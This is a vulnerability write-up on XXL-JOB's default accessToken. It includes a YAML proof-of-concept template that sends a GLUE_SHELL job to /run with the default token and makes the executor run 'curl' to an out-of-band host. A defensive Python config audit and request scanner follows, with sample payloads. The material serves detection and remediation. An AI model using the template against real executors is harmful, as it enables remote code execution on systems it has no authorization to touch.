Vulnerability description
XXL-JOB ships with a default accessToken; an executor that still uses it accepts job-run requests from anyone who sends that token, which can lead to remote code execution (RCE).
id: xxl-job-default-token-bypass-rce
info:
  name: XXL-JOB 默认 accessToken 身份绕过漏洞
  author: zan8in
  severity: critical
  verified: true
  description: |-
    XXL-JOB 默认 accessToken 身份绕过,可导致远程代码执行 (RCE) 攻击。
  reference:
    - https://mp.weixin.qq.com/s/vk1VYGfyE_U3O_1EoQThXw
    - https://mp.weixin.qq.com/s/KzrjRgYZHewskRzrkOUnEA
  tags: xxl-job,rce,bypass
  created: 2023/08/22
set:
  oob: oob()
  oobHTTP: oob.HTTP
  nowtime: timestamp_second(0)
  timestr: string(nowtime) + "000"
rules:
  r0:
    request:
      method: POST
      path: /run
      headers:
        XXL-JOB-ACCESS-TOKEN: default_token
        Cookie: XXL_JOB_LOGIN_IDENTITY=0
        Content-Type: application/json
      body: |
        {
          "jobId": 1,
          "executorHandler": "demoJobHandler",
          "executorParams": "demoJobHandler",
          "executorBlockStrategy": "COVER_EARLY",
          "executorTimeout": 0,
          "logId": 1,
          "logDateTime": {{timestr}},
          "glueType": "GLUE_SHELL",
          "glueSource": "curl {{oobHTTP}}",
          "glueUpdatetime": {{timestr}},
          "broadcastIndex": 0,
          "broadcastTotal": 0
        }
    expression: oobCheck(oob, oob.ProtocolHTTP, 3)
expression: r0()
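The template above works because the executor's only authentication for POST /run is the XXL-JOB-ACCESS-TOKEN header, and the shipped value is default_token. The following Python is an added defensive example, not part of the original PoC or of the XXL-JOB project. It does two things: audits an application.properties snippet for an unset or still-default xxl.job.accessToken (the XXL-JOB property that both admin and executor must set to the same, non-default secret), and scans HTTP request records for the request shape the PoC sends (POST /run with the default token, escalated when glueType is GLUE_SHELL). The properties text, the request records and the strong-token placeholder are all constructed sample data; the record layout (method/path/headers/body/source) is an assumption about whatever log source you feed it.

```python
"""Defensive checks for the XXL-JOB default accessToken weakness (added example)."""
import json

DEFAULT_TOKEN = "default_token"            # value XXL-JOB ships with
TOKEN_HEADER = "xxl-job-access-token"      # executor auth header, compared case-insensitively here


def check_executor_config(properties_text: str) -> list[str]:
    """Return findings for an application.properties snippet.

    An empty or missing xxl.job.accessToken disables the token check entirely;
    the shipped value lets anyone who knows it call /run.
    """
    findings = []
    token = None
    for raw in properties_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        key, _, value = line.partition("=")
        if key.strip() == "xxl.job.accessToken":
            token = value.strip()
    if not token:
        findings.append("xxl.job.accessToken is unset or empty: /run accepts any caller")
    elif token == DEFAULT_TOKEN:
        findings.append("xxl.job.accessToken is the shipped value 'default_token'")
    return findings


def find_default_token_runs(requests: list[dict]) -> list[dict]:
    """Flag POST /run requests that authenticate with the default token.

    Each record is a dict with method, path, headers, body and source (assumed
    layout). A GLUE_SHELL body means the scheduler-supplied script would be
    executed by the executor, so it is rated critical; anything else is high.
    """
    hits = []
    for req in requests:
        if req.get("method", "").upper() != "POST" or req.get("path") != "/run":
            continue
        headers = {k.lower(): v for k, v in req.get("headers", {}).items()}
        if headers.get(TOKEN_HEADER) != DEFAULT_TOKEN:
            continue
        try:
            body = json.loads(req.get("body") or "{}")
        except json.JSONDecodeError:
            body = {}
        glue_type = body.get("glueType", "")
        hits.append({
            "source": req.get("source", "?"),
            "severity": "critical" if glue_type == "GLUE_SHELL" else "high",
            "glueType": glue_type,
            "glueSource": body.get("glueSource", ""),
        })
    return hits


# Constructed sample data (not taken from any real deployment).
SAMPLE_PROPERTIES_WEAK = "xxl.job.accessToken=default_token\n"
SAMPLE_PROPERTIES_FIXED = "xxl.job.accessToken=REPLACE-WITH-LONG-RANDOM-SECRET\n"

SAMPLE_REQUESTS = [
    {   # shape of the PoC request: default token + shell glue
        "source": "203.0.113.10", "method": "POST", "path": "/run",
        "headers": {"XXL-JOB-ACCESS-TOKEN": "default_token", "Content-Type": "application/json"},
        "body": json.dumps({"jobId": 1, "glueType": "GLUE_SHELL", "glueSource": "curl http://oob.example"}),
    },
    {   # legitimate scheduler call with a non-default token: ignored
        "source": "10.0.0.5", "method": "POST", "path": "/run",
        "headers": {"XXL-JOB-ACCESS-TOKEN": "REPLACE-WITH-LONG-RANDOM-SECRET"},
        "body": json.dumps({"jobId": 7, "glueType": "BEAN", "executorHandler": "demoJobHandler"}),
    },
    {   # wrong method: ignored
        "source": "203.0.113.10", "method": "GET", "path": "/run",
        "headers": {"XXL-JOB-ACCESS-TOKEN": "default_token"}, "body": "",
    },
    {   # default token but a BEAN job: still worth an alert
        "source": "198.51.100.7", "method": "POST", "path": "/run",
        "headers": {"xxl-job-access-token": "default_token"},
        "body": json.dumps({"jobId": 1, "glueType": "BEAN", "executorHandler": "demoJobHandler"}),
    },
]


def main() -> None:
    for label, text in (("weak", SAMPLE_PROPERTIES_WEAK), ("fixed", SAMPLE_PROPERTIES_FIXED)):
        print(f"config[{label}]:", check_executor_config(text) or ["ok"])
    for hit in find_default_token_runs(SAMPLE_REQUESTS):
        print("ALERT", hit)


if __name__ == "__main__":
    main()
```

The config check is the remediation side: set xxl.job.accessToken to a long random value on the admin and on every executor (they must match, since the admin sends it in the same header), then confirm the executor's /run rejects the old default. The request scan is the detection side; because the executor port normally only receives traffic from the admin host, any /run carrying the default token from another source is a strong signal on its own.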